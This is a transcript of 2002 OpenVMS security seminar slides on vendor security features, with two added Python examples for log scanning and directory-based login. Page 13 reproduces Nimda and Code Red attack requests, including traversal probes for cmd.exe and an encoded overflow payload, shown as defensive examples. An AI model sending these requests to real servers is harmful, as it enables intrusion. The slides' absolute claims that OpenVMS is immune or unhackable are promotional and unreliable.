OpenVMS Security Seminar
John Robert Wisniewski, June 2002

Transcript of the seminar slides.

Page 1:

John Robert Wisniewski, June 2002

OpenVMS Security Seminar

Page 2:

John Robert Wisniewski, June 2002

http://vmsone.com

[email protected]

Page 3:

Security Seminars Agenda

– 1 hour 15 minutes: OpenVMS and IT Security Update (John Wisniewski – OpenVMS Engineering)

– 10 minutes: Break

– 1 hour 15 minutes: Vulnerability assessment (Antonio Martin – Point Secure)

– 15 minutes: Q&A

– Schedule Security Consulting Session for tomorrow

Page 4:

After 25 Years… Why OpenVMS…

Page 5:

VMS when computer failure is not an option!

Page 6:

Page 7:

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

http://story.news.yahoo.com/news?tmpl=story&cid=75&ncid=738&e=8&u=/nf/20020516/tc_nf/17784

".....the Department of Defense has been running cyber security exercises against the National Security Agency, the U.S. Air Force's 92nd Information Warfare Aggressor Squadron, and the Army's Land Information Warfare Activity.

What they have learned is that the "install-and-patch" system does not work, especially against a concentrated attack. Operating systems, they have concluded, need to be designed more securely from the outset."

Page 8:

From Keith Parris’s white paper on comp.os.vms:

Some here have contended that because TCP/IP Services for OpenVMS is based on Tru64 Unix code, it is thus subject to the same level of risk of buffer-overflow exploits as any Unix system out there.

After a bit of investigation, I've discovered that VMS on Alpha appears to be immune to these common smash-the-stack buffer overflow attacks.

To understand why, first one must understand how common buffer-overflow attacks work. (A classic paper on such attacks is "Smashing the Stack for Fun And Profit" written by a hacker who goes by the name Aleph One. You can read it at http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/profit.html)

So Alpha VMS is immune to common stack-smashing buffer-overflow attacks.

While any code that fails to check data lengths against buffer sizes is arguably broken, and needs to be fixed, and Compaq has been doing this to TCP/IP code as buffer-overflow bugs are identified, such bugs are much less critical on Alpha VMS compared with less-protected implementations.

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

Page 9:

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

SECURITY SEARCH BY OPERATING SYSTEM NAME

http://www.cert.org/

VMS/OpenVMS -- 45 CERT Advisories in 13 years… (2 Weeks to check)

Windows 2000 -- 484 CERT Advisories in 11 Months ( 12 weeks)

Linux -- 546 CERT Advisories since 97 (14 weeks)

Solaris -- 490 CERT Advisories in 5 years (12 weeks)

AIX -- 377 CERT Advisories since 94 (9 weeks)

UNIX -- 568 CERT Advisories (14 weeks)

FOR EACH CERT ADVISORY IT WOULD TAKE 1 HOUR (average) for a knowledgeable systems engineer to evaluate and potentially fix!

Page 10:

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

SECURITY SEARCH BY COMPANY

http://www.cert.org/

Oracle -- 206 CERT Advisories

COMPAQ -- 236 CERT Advisories

CISCO -- 361 CERT Advisories

HP -- 436 CERT Advisories

IBM -- 626 CERT Advisories

SUN -- 711 CERT Advisories

Microsoft -- 1018 CERT Advisories

Page 11:

SECURITY HAS TO BE BUILT IN FROM THE GROUND UP

BUT MICROSOFT IS IN A CLASS BY ITSELF

http://www.cert.org/

Windows 2000 484

Windows XP 21

Windows NT 359

Windows 98 138

Windows 95 75

Windows Networking 401

Windows SQL 80

Windows Visual Basic 16

Windows Visual C++ 2

Windows Visual Studio 8

Windows Java 68

Windows Netscape 71

Windows LDAP 55

Windows Active Directory 31

Windows Media Player 3

Microsoft Exchange 67

Microsoft Word 30

Microsoft Excel 28

Microsoft Power Point 5

Microsoft office 221

Microsoft Internet Explorer 214

Microsoft Chat 38

Microsoft Windows 468

Back Office 257

IIS 205

This list consists of 2845 CERT Advisories regarding Microsoft OS and products, which might take as much as 1.3 years to evaluate.

Page 12:

OpenVMS: immune to viruses

There has never been a reported incident of OpenVMS ever being infected with a virus

Page 13:

NIMDA/Code Red VMS Apache logs

Subject: access_log from vmsone

65.193.255.237 - - [28/Sep/2001:23:40:42 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277
65.193.255.237 - - [28/Sep/2001:23:40:42 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 275
65.193.255.237 - - [28/Sep/2001:23:40:43 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
65.193.255.237 - - [28/Sep/2001:23:40:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
65.193.255.237 - - [28/Sep/2001:23:40:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
65.193.255.237 - - [28/Sep/2001:23:40:47 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
65.193.255.237 - - [28/Sep/2001:23:40:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316
65.193.255.237 - - [28/Sep/2001:23:40:50 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332
65.193.255.237 - - [28/Sep/2001:23:40:55 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.193.255.237 - - [28/Sep/2001:23:40:58 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.193.255.237 - - [28/Sep/2001:23:40:58 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
65.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
65.193.255.237 - - [28/Sep/2001:23:40:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 282
65.193.255.237 - - [28/Sep/2001:23:41:00 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
65.193.255.237 - - [28/Sep/2001:23:41:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
65.64.234.177 - - [29/Sep/2001:00:22:13 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
65.64.234.177 - - [29/Sep/2001:01:08:00 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
65.64.234.177 - - [29/Sep/2001:01:43:20 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
65.64.234.177 - - [29/Sep/2001:02:11:05 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272

65.64.137.51 - - [29/Sep/2001:15:45:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277
65.64.137.51 - - [29/Sep/2001:15:46:36 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 275
65.64.137.51 - - [29/Sep/2001:15:46:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 285
65.64.234.177 - - [29/Sep/2001:15:52:35 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
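The access_log excerpt above shows the request shapes a web administrator had to recognise in 2001: the Nimda probes for root.exe and cmd.exe, the double-encoded (..%255c..) and overlong-UTF-8 (..%c0%af..) traversal variants, and the Code Red .ida request with its %u-encoded payload. The Python below is an added example, not code from the seminar or from the OpenVMS web server project: it parses Apache common-log-format lines and flags those indicators, decoding the path repeatedly so that the double-encoded variants are recognised as traversal. The log lines inside it are constructed with RFC 5737 documentation addresses, not the addresses from the slide.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample entries in Apache common log format. They mirror the
# request shapes in the seminar's access_log excerpt but use RFC 5737
# documentation addresses; nothing here is a real client or a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Sep/2001:23:40:42 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 277
192.0.2.10 - - [28/Sep/2001:23:40:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
192.0.2.10 - - [28/Sep/2001:23:40:58 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
192.0.2.20 - - [29/Sep/2001:00:22:13 -0500] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 272
192.0.2.30 - - [29/Sep/2001:09:15:00 -0500] "GET /index.html HTTP/1.0" 200 1043
192.0.2.30 - - [29/Sep/2001:09:15:02 -0500] "GET /images/logo.gif HTTP/1.0" 200 2210
"""

# Common log format: host ident authuser [date] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_rounds(path, max_rounds=3):
    """Percent-decode repeatedly until the path stops changing.

    Returns (decoded_bytes, rounds). rounds > 1 means the client double-encoded
    the path ('..%255c..' becomes '..%5c..' and only then '..\\..'), which a
    single-pass decoder or a fixed-string signature never sees.
    """
    cur = path.encode("latin-1", "replace")
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(cur)
        if nxt == cur:
            break
        cur, rounds = nxt, rounds + 1
    return cur, rounds


def classify(entry):
    """List the worm indicators present in one parsed entry (empty list = clean)."""
    path = entry["path"]
    decoded, rounds = decode_rounds(path)
    lowered = decoded.lower()
    reasons = []
    if b"cmd.exe" in lowered or b"root.exe" in lowered:
        reasons.append("Windows command shell requested")
    if b"default.ida" in lowered:
        reasons.append("Code Red .ida request")
    if re.search(r"%u[0-9a-f]{4}", path, re.IGNORECASE):
        reasons.append("IIS %u encoding in query")
    if rounds > 1:
        reasons.append("double URL-encoding")
    if 0xC0 in decoded or 0xC1 in decoded:
        # A 0xC0/0xC1 lead byte is always an overlong UTF-8 form (e.g. %c0%af
        # for '/'); a strict decoder rejects it instead of treating it as '/'.
        reasons.append("overlong UTF-8 sequence")
    if b"../" in decoded or b"..\\" in decoded:
        reasons.append("directory traversal after decoding")
    return reasons


def scan(log_text):
    """Return (ip, raw_path, reasons) for every entry that matches an indicator."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue                      # not common log format; skip it
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["path"], reasons))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {path[:60]} -> {', '.join(reasons)}")
```

The point of the repeated decode is that the '..%255c..' request is harmless as a literal string and only becomes '..\..' after two decoding passes; the server that decoded it twice is the one that was exploited, so the detector has to decode the same way. The check on 0xC0/0xC1 lead bytes catches the overlong-UTF-8 family without enumerating each variant, and on an OpenVMS server these requests were all 404s, which is the log reader's cue that the worm probed and failed.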

Page 14:

OpenVMS: untouched by hackers

In congressional testimony before the Senate Governmental Affairs Committee, the world’s most notorious hacker, Kevin Mitnick, said he could not penetrate it.

Source: Governmental Affairs Committee Hearing, March 2, 2000

Page 15:

In 20 years of hacking, Kevin Mitnick says he only once failed to penetrate a computer system.

• Regarding that unsuccessful hack attempt, Mitnick, who successfully cracked computer systems belonging to Motorola, Fujitsu and Sun Microsystems, said he targeted the computer because it belonged to an "individual" who had found vulnerabilities in Digital Equipment Corp’s VMS operating system. "And my goal was obtaining information on all security vulnerabilities so I'd be effective in compromising any security system that I chose to compromise," he said.

• However, the hacker said he found his target "extremely difficult" to crack because "this person was very, very sharp" on computer security.

Page 16:

Security Landscape

• 2002 CSI/FBI computer crime and security survey is out and available at: http://www.gocsi.com/

– Over 500 security practitioners surveyed

– 74% cite their internet connection as the point of attack

– 82% think independent hackers are the likely sources of attack

– Website attacks (Hacktivism and DoS)

The face of hacking is changing… But so too are attitudes about hackers: 69% would not consider hiring reformed hackers as consultants!

Would you hire this man?

Page 17:

What is DEFCON 9?

• DEFCON is the 9th convention of hackers, held once each year in Las Vegas

• http://www.defcon.org/

• 4300+ hackers invaded the hotels around the Alexis Convention Center

OpenVMS was declared Cool and Unhackable by the DEFCON Goons (judges)

Page 18:

OpenVMS At DEFCON 9

Page 19:

OpenVMS At DEFCON 9

OpenVMS was given “Props” from the Goons. The DFWLUG Hacker Squad gained much glory. And hackers were given a taste of a real operating system.

Page 20:

OpenVMS V7.2-1H1 shipping

Page 21:

OpenVMS V7.2-2 shipping

Page 22:

OpenVMS V7.2-6C2 shipping

Page 23:

OpenVMS V7.3 shipping

Page 24:

Release Timeline

2001 H1 V7.3

2001 H2 V7.2-2

2002 H3 V7.3-1

2002 H4 Itanium™ Processor Family - First boot

2003 H2 V7.3-x

2003 H2 Itanium™ Processor Family - 1st release

2003 H3 Itanium™ Processor Family - 2nd release

2004 H1 Itanium™ Processor Family - 3rd release

2004... New OpenVMS Itanium™ Processor Family Functional Releases

Page 25:

OpenVMS Security Directions

Enabling Industry Standard Security Protocols for Authentication and Encryption in Heterogeneous Environments

• Protecting information with cryptography

– OpenSSL (open group's secure socket layer)

– CDSA (common data security architecture)

– STUNNEL (secure tunnel)

– SSH (secure shell) future

– IPSEC (IP security) future

• Enabling access through new authentication models

– Kerberos

– NTLM (NT authentication)

– Application access to authentication (SYS$ACM)

– LDAP authentication future

– XML security future

• Delivering complete security services solutions

Page 26:

Expanding the Model for eBiz

[Diagram: System 1 and System 2, each with Application, Web server, Network and Kernel layers, connected over a network; System 2 also fronts a DB.]

• Server security

– Authentication

– Authorization

– Access control

• Transport security

– Confidentiality

– Integrity

– Non-repudiation

Page 27:

OpenVMS Security in 7.3-1

• Kerberos

• OpenSSL (secure socket layer)

• 64-bit API calls

• Enhanced documentation

• Certificate tool

• Stunnel (secure tunnel)

• CDSA

• Enhanced documentation

• Error reporting tools

• SYS$ACM published

Page 28:

Network Security

[Diagram: System 1 and System 2 (Application, Web server, Network, Kernel layers) connected over the network; the Transport layer is protected by SSL and IPSEC, with PKI tools, Kerberos and SSH alongside. Legend: = Shipping, = Planned.]

Page 29:

Security MUPs and Advisories

•OpenVMS DECWindows MUP (next)

•OpenVMS Alpha 7.2

•DEC-AXPVMS-VMS72_SYS-V0100--4

•DEC-AXPVMS-VMS721_SYS-V0100--4

•OpenVMS Alpha Security MUP

ALPSMUP01_070 (Versions 6.1,6.2 & 7.0)

•OpenVMS VAX Security MUP

VAXSMUP03 (All Versions prior to 6.1)

Page 30:

DECwindows MUP

DECwindows Motif server has a potential security vulnerability that could be exploited to allow existing users unauthorized access to data and system resources.

• This mandatory update required a reboot

• Affected systems are only those that have the DECwindows server installed on them

• Supported versions impacted:

• OpenVMS Alpha versions 6.2, 7.1-2, 7.2-1H1, 7.2-2, 7.3

• OpenVMS VAX versions 6.2, 7.1, 7.2, 7.3

• SEVMS Alpha version 6.2 & SEVMS VAX version 6.2

Page 31:

ACMS Security Advisory

• There is a potential security vulnerability involving ACMS processes having more privileges enabled than the privileges specified in the authorization file.

• To protect against this potential security risk, Compaq is making available an update ECO for ACMS V4.3 customers running OpenVMS Alpha V7.2-1, V7.2-1H1, V7.2-2, and V7.3.

• For ACMS V4.4 customers there is a new version, ACMS V4.4A; ACMS V4.4 customers should upgrade to V4.4A immediately.

Page 32:

Open Source Security Notes

• Compaq’s SSRT (Software Security Response Team) is our voice to the CERT organization: http://www.cert.org/

• Advisories: www.compaq.com/support

Specifically: http://ftp.support.compaq.com/patches/.new/security.shtml

• Current: (SNMP, PHP, zlib, Kerberos)

• No compromise of OpenVMS system security, but compromise of data could be possible.

Page 33:

Kerberos VMS implementation: Kerberos in OpenVMS (V7.3-1)

• Integration

– Based on MIT Kerberos V5 release 1.0.5

– Available on V7.2, 7.3 (VAX & Alpha) Web kit

– GSSAPI V2

– GUI & DCL interface

– KDC (Key Distribution Center) & APIs (Client)

– Cert fix

• Kerberized Telnet in TCP/IP Services for OpenVMS Version 5.3

Kerberos Futures

•Next version (7.x)

•Port MIT Kerberos V5 release 1.2.4 to OpenVMS

– Provides “hooks” necessary for Kerberized TCP/IP utilities

– Triple-DES encryption available

•Make Kerberos API thread-safe

•Future versions

•Kerberos ACME plug-in

•Cluster-aware KDC

•Use CDSA for cryptographic functions

Page 34:

OpenSSL for OpenVMS

• Port of OpenSSL 0.9.6b

• Layered Product (in V7.3-1 as LP) runs on 7.2-2

• Integration into Base O/S when OpenSSL hits 1.0

• PCSI kit containing

– 32-bit SSL & Crypt libraries

– 64-bit SSL & Crypt libraries

• Features:

• 64-bit SSL and Crypto APIs (32 bit API’s as well)

• Alpha Performance

• Documentation & Examples

– New Book – Open Source Security on OpenVMS Alpha

– 200 SSL APIs (60 previously undocumented)

– 40 Crypt APIs (10 previously undocumented)

• Certificate Tool

Page 35:

OpenSSL limitations

OpenSSL is a set of libraries that cannot secure applications without modification to the application. OpenSSL alone cannot secure popular TCP/IP applications such as telnet and FTP/RCP.

Solutions:

• SSH1 and SSH2 - secure shell

– TCP/IP services 5.3 security EAK (fall)

– Process software http://www.process.com

– OpenSSH

• Stunnel (www.stunnel.org)

– SSL wrapper for TCP/IP application

Page 36:

Stunnel (Secure Tunnel)

Stunnel is an SSL encryption wrapper between client and server that enables non-SSL aware daemons to communicate with clients over a secure SSL channel.

Stunnel can be used to add SSL functionality to commonly used inetd daemons like POP-2, POP-3 and IMAP servers without any changes in the programs' code.

• Open Source Project provided on the OpenSource Projects CD.

– Limited support

– Telnet & RCP works but no FTP

– Threaded SMP support!

• Website: http://www.stunnel.org

Page 37:

How STUNNEL works

1. SSL server: (stunnel -d 992 -r localhost:23 -p stunnel.pem)

2. SSL client: (stunnel -c -d 992 -r remote:992)

3. Application: (telnet localhost 992)

[Diagram: two hosts, each with IP, TCP and Application layers; the SSL server (Stunnel) on one host and the SSL client (Stunnel) on the other; arrows labelled 1, 2 (SSL) and 3 for the three steps above.]

Page 38:

Application Security

[Diagram: Cryptography layer with OpenSSL (SSL crypto library), BSAFE and PKI/Certificate; Kerberos API; CDSA; crypto apps, S/MIME and PKI above. Legend: = Shipping, = Planned.]

Page 39:

CDSA Architecture

[Diagram: layered stack, top to bottom]

CDSA Applications

CSSM Security API

Integrity Services, Security Contexts

Module managers: CSP Manager, TP Module Manager, CL Module Manager, DL Module Manager, AC Module Manager

Service provider modules and their interfaces:

– Cryptographic Service Provider (SPI)

– Trust Model Library (TPI)

– Certificate Library (CLI)

– Data Storage Library (DLI)

– Authorization Computation Library (ACI)

Page 40:

CDSA for OpenVMS

• Shipping as part of 7.3-1

• Based on CDSA V2 release 3.11 with some 3.12 features

• Port of Tru64 implementation with bilateral authentication

• Prerequisite for IPSEC (will run on 7.2-2 and up)

• Contains RSA & OpenSSL as Crypto Service Providers.

• Documentation & Examples

– New Book – Open Source Security on OpenVMS Alpha Vol 1

– 2 example programs: DES, MDS

Page 41:

SYS$ACM

• Published and supported in 7.3-1

• Reduces authentication calls/steps from 12 to 1!

• Example: CSWS for OpenVMS will use this for mod_auth_openvms

• Part 1: 7.3-1 SYS$ACM published!

• Part 2: 7.next (VMS) Complete framework for external authentication solution (EAK)

– NDA Document “ACME Developers Guide”

– New ACME Loginout & Set Password images (not defaults)

Page 42:

LDAP V3 in OpenVMS 7.3

• OpenVMS 7.3 includes an LDAP V3 API to enable access to LDAP directories anywhere in the enterprise.

• LDAP supports multi-threaded 64-bit & 32-bit applications and is COM (Common Object Model) aware. 

• Certification efforts

• Microsoft’s Active Directory

• Novell’s NDS

• Compaq’s X.500 V4.0

• Kerberos V5 & Public Key Infrastructure (PKI).

Page 43:

LDAP-based authentication

[Diagram: two flows against an LDAP directory. System authentication: loginout, ftp and telnet call $ACM, which uses auth_ldap against the LDAP directory and the VMS UAF. Web authentication: CSWS uses mod_auth_vms against the LDAP directory and the UAF (mapping info). Legend: Exists / New.]

LDAP: username/password + UAF mapping

UAF: quota, security profile

Page 44:

LDAP – THE FUTURE DIRECTION OF OPENVMS AUTHENTICATION

Single username & password across enterprise

•LDAP directory just stores Username and Password.

•Usable by many platforms provided they agree on the same style of LDAP authentication. (Example Web page or VMS/Unix login all use same Username & password.)

•Once Authenticated the user is mapped back to a local UAF record.

•Implemented inside the ACME framework.

•Plans are in place to do this work.
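The slide describes a two-stage design: the directory answers only whether the username and password match, and the local UAF record, reached through a mapping, still decides what the user may do. The Python below is an added example, not code from the seminar or from the OpenVMS ACME framework: it models that split with a constructed in-memory stand-in for the directory (salted PBKDF2 verifiers instead of cleartext), a constructed mapping table and constructed UAF records, and it shows the three distinct ways a login can fail (bad password, authenticated but no local record, local record disabled). The SYS$ACM and ACME interfaces themselves are not modelled; the function and record names are this example's own.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Optional

# All data below is constructed for this example. The directory holds only a
# password verifier per user name; everything that governs what the user may do
# on the local system (UIC, privileges, disabled flag) stays in the UAF record.

PBKDF2_ROUNDS = 50_000


def _verifier(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def directory_entry(password: str) -> dict:
    salt = os.urandom(16)
    return {"salt": salt, "hash": _verifier(password, salt)}


# Stand-in for the LDAP directory: user name -> password verifier (constructed)
DIRECTORY = {
    "alice": directory_entry("correct horse battery staple"),
    "bob": directory_entry("hunter2"),
    "carol": directory_entry("letmein"),
}


@dataclass(frozen=True)
class UafRecord:
    username: str              # local OpenVMS account name
    uic: str                   # user identification code
    privileges: frozenset      # authorized privileges
    disabled: bool = False     # stands in for the DISUSER flag


# Stand-in for the local UAF (constructed). carol has a mapping but no record:
# she can authenticate to the directory yet must still be refused locally.
UAF = {
    "ALICE": UafRecord("ALICE", "[200,1]", frozenset({"NETMBX", "TMPMBX"})),
    "BOB": UafRecord("BOB", "[200,2]", frozenset({"NETMBX"}), disabled=True),
}
MAPPING = {"alice": "ALICE", "bob": "BOB", "carol": "CAROL"}


@dataclass(frozen=True)
class AuthResult:
    ok: bool
    reason: str
    record: Optional[UafRecord] = None


def directory_bind(username: str, password: str) -> bool:
    """Step 1: the directory answers only 'is this the right password?'."""
    entry = DIRECTORY.get(username)
    if entry is None:
        _verifier(password, bytes(16))    # same work for unknown names: no timing tell
        return False
    return hmac.compare_digest(_verifier(password, entry["salt"]), entry["hash"])


def authenticate(username: str, password: str) -> AuthResult:
    """Directory authentication followed by mapping to a local UAF record."""
    if not directory_bind(username, password):
        return AuthResult(False, "directory bind failed")
    # Step 2: map the directory identity back to a local account
    local_name = MAPPING.get(username)
    record = UAF.get(local_name) if local_name else None
    if record is None:
        return AuthResult(False, "no local UAF record mapped")
    # Step 3: local policy still decides whether the login may proceed
    if record.disabled:
        return AuthResult(False, "account disabled in UAF")
    return AuthResult(True, "ok", record)


if __name__ == "__main__":
    for user, pw in [("alice", "correct horse battery staple"), ("bob", "hunter2"),
                     ("carol", "letmein"), ("nobody", "x")]:
        print(user, authenticate(user, pw).reason)
```

The design point is that the directory never learns about quotas, privileges or the disabled flag, and the local system never learns the password: a compromise of either store alone does not yield a usable login, and an account can be shut off locally without touching the shared directory.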

Page 45:

3. Token-based authentication

[Diagram: loginout calls $ACM; the VMS agent and a new “x” agent consult an X509 directory; CDSA/EMM talks to a smart card holding the private key. Legend: Exists / New.]

Page 46:

OpenVMS Security Roadmap

Timeline axis: 2002 2003 2004 2005

Version 7.3-1 (Alpha only)

• CDSA (for IPSEC)

• OpenSSL API published

• SYS$ACM API published

• Kerberos integration

• Stunnel (Secure Tunnel)

ITSEC C2 Security Evaluation on V7.2-2

Encryption for OpenVMS V1.6

TCP/IP Security EAK

Version 7.x (Alpha and VAX)

• ACME Login base deployment

• ACME LOGIN Early Adopters Kit (EAK)

• Updated versions of: OpenSSL, Kerberos, CDSA

• Unix Portability features: UID/GUID support, case sensitive passwords, minimum lifetime, CDE deadman, CDE screenlock

Alternative Authentication

• BIOMETRIC support

• Smartcard

Page 47:

got secure web sites?

Page 48:

A recent headline

Microsoft released a “critical” security patch Wednesday for its Web server software, plugging 10 new holes that could allow hackers to take full control of computers running the company’s Internet Information Server (IIS) program.

Microsoft issues “critical” server fix – April 10, 2002

http://news.com.com/2100-1001-880179.html

Page 49:

But wait, there’s more!

• One in Nine IIS Servers Compromised, Survey Says – November 5, 2001 – pcworld.com

• Security hole in SQL Server lets attackers take over – June 13, 2001 – infoworld.com

• Worm hits thousands of Solaris and IIS servers – May 11, 2001 – infoworld.com

• Microsoft gives a virus to its support customers – April 27, 2001 – infoworld.com

Page 50:

Oh, by the way, hackers and viruses aren’t going away

Source: Carnegie Mellon’s Software Engineering Institute

Note that an incident may involve one site, hundreds of sites, or thousands of sites.

[Chart: incidents per year, logarithmic scale from 1 to 100,000, years 1988 to 2003]

Page 51:

Don’t treat the symptoms, cure the disease

Instead of trying to patch your existing web servers again and again and again, start with…

• the most stable,

• the most secure,

• the most reliable server operating system:

OpenVMS

Still, nothing stops it

Page 52:

OpenVMS: immune to viruses

There has never been a reported incident of OpenVMS ever being infected with a virus

Page 53:

OpenVMS: secure and stable out of the box

Security

• OpenVMS received a U.S. Trusted Computer System Evaluation Criteria (TCSEC) C2 Security Rating

• Cluster-wide, cluster aware intrusion detection

Stability

• OpenVMS doesn’t fall down

– Often put in a closet and “forgotten”

– Eighteen years without rebooting

• It’s the gold standard for high availability clustering, up to 96 nodes in a cluster

Page 54:

OpenVMS is the foundation for…

HP Secure Web Server for OpenVMS (based on Apache)

Based on the Apache Software Foundation’s “HTTP Server” open source project known as “Apache” – http://httpd.apache.org

Page 55:

Some Apache info…

HTTP/1.1 (RFC2616) compliant web server

Runs on Windows, Linux, UNIX, OpenVMS, ...

And Apache is the most popular web server on the Internet with a 63% market share

• http://www.netcraft.com/survey

Some companies drop Microsoft IIS for Apache – October 4, 2001

http://www.internetweek.com/newslead01/lead100401.htm

Page 56:

HP Secure Web Server (SWS) for OpenVMS

• Based on recent Apache baselevels

• Tailored for OpenVMS cluster and security architecture

• Includes SSL (certificate-based authentication and encryption services for sockets)

• VeriSign supported platform, for additional security levels

– http://www.verisign.com/support/install/

• www.openvms.compaq.com is running SWS

Page 58:

for more information

SWS web site

• http://www.openvms.compaq.com/openvms/products/ips/apache/csws.html

Page 59:

OpenVMS System Management

Page 60:

OpenVMS Tool Plans

• Availability Manager

